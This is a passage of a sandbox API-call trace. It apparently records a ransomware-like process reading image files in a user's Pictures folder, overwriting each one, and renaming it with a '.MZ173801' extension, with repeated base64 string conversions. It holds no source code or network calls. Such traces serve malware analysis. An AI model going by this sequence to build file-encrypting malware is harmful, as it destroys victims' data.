lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.081] GetCurrentThreadId () returned 0x1358 [0116.081] GetCurrentThreadId () returned 0x1358 [0116.081] GetCurrentThreadId () returned 0x1358 [0116.081] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\s1HnMB.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\s1hnmb.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.081] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0116.081] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.081] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0xf700 [0116.081] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.081] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xf700, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0xf700, lpOverlapped=0x0) returned 1 [0116.083] CloseHandle (hObject=0x3d0) returned 1 [0116.084] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\s1HnMB.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\s1hnmb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.085] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0xf700, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0xf700, lpOverlapped=0x0) returned 1 [0116.087] CloseHandle (hObject=0x3d0) returned 1 [0116.089] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\s1HnMB.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\s1hnmb.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\s1HnMB.png.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\s1hnmb.png.mz173801")) returned 1 [0116.089] GetCurrentThreadId () returned 0x1358 [0116.089] GetCurrentThreadId () returned 0x1358 [0116.089] GetCurrentThreadId () returned 0x1358 [0116.089] GetCurrentThreadId () returned 0x1358 [0116.089] GetCurrentThreadId () returned 0x1358 [0116.089] GetCurrentThreadId () returned 0x1358 [0116.089] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2a3c2f0, ftCreationTime.dwHighDateTime=0x1d5e3d7, ftLastAccessTime.dwLowDateTime=0xa068be10, ftLastAccessTime.dwHighDateTime=0x1d5e859, ftLastWriteTime.dwLowDateTime=0xa068be10, ftLastWriteTime.dwHighDateTime=0x1d5e859, nFileSizeHigh=0x0, nFileSizeLow=0x17fd9, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="XbxN-s5VyE.gif", cAlternateFileName="XBXN-S~1.GIF")) returned 1 [0116.089] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.089] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.089] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\XbxN-s5VyE.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\xbxn-s5vye.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2a3c2f0, ftCreationTime.dwHighDateTime=0x1d5e3d7, ftLastAccessTime.dwLowDateTime=0xa068be10, ftLastAccessTime.dwHighDateTime=0x1d5e859, ftLastWriteTime.dwLowDateTime=0xa068be10, ftLastWriteTime.dwHighDateTime=0x1d5e859, nFileSizeHigh=0x0, nFileSizeLow=0x17fd9)) returned 1 [0116.090] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.090] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.090] GetCurrentThreadId () returned 0x1358 [0116.090] GetCurrentThreadId () returned 0x1358 [0116.090] GetCurrentThreadId () returned 0x1358 [0116.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.176] GetCurrentThreadId () returned 0x1358 [0116.176] GetCurrentThreadId () returned 0x1358 [0116.177] GetCurrentThreadId () returned 0x1358 [0116.177] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\XbxN-s5VyE.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\xbxn-s5vye.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.177] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0116.177] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.177] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x17fd9 [0116.177] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.177] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x17fd9, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x17fd9, lpOverlapped=0x0) returned 1 [0116.178] CloseHandle (hObject=0x3d0) returned 1 [0116.180] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\XbxN-s5VyE.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\xbxn-s5vye.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.181] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x17fd9, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0x17fd9, lpOverlapped=0x0) returned 1 [0116.184] CloseHandle (hObject=0x3d0) returned 1 [0116.186] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\XbxN-s5VyE.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\xbxn-s5vye.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\XbxN-s5VyE.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\xbxn-s5vye.gif.mz173801")) returned 1 [0116.187] GetCurrentThreadId () returned 0x1358 [0116.187] GetCurrentThreadId () returned 0x1358 [0116.187] GetCurrentThreadId () returned 0x1358 [0116.187] GetCurrentThreadId () returned 0x1358 [0116.187] GetCurrentThreadId () returned 0x1358 [0116.187] GetCurrentThreadId () returned 0x1358 [0116.187] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe05d01c0, ftCreationTime.dwHighDateTime=0x1d5e525, ftLastAccessTime.dwLowDateTime=0xaf2bf320, ftLastAccessTime.dwHighDateTime=0x1d5e621, ftLastWriteTime.dwLowDateTime=0xaf2bf320, ftLastWriteTime.dwHighDateTime=0x1d5e621, nFileSizeHigh=0x0, nFileSizeLow=0x15f93, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="XO1z23.bmp", cAlternateFileName="")) returned 1 [0116.187] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.187] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.187] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\XO1z23.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\xo1z23.bmp"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe05d01c0, ftCreationTime.dwHighDateTime=0x1d5e525, ftLastAccessTime.dwLowDateTime=0xaf2bf320, ftLastAccessTime.dwHighDateTime=0x1d5e621, ftLastWriteTime.dwLowDateTime=0xaf2bf320, ftLastWriteTime.dwHighDateTime=0x1d5e621, nFileSizeHigh=0x0, nFileSizeLow=0x15f93)) returned 1 [0116.188] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.188] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OU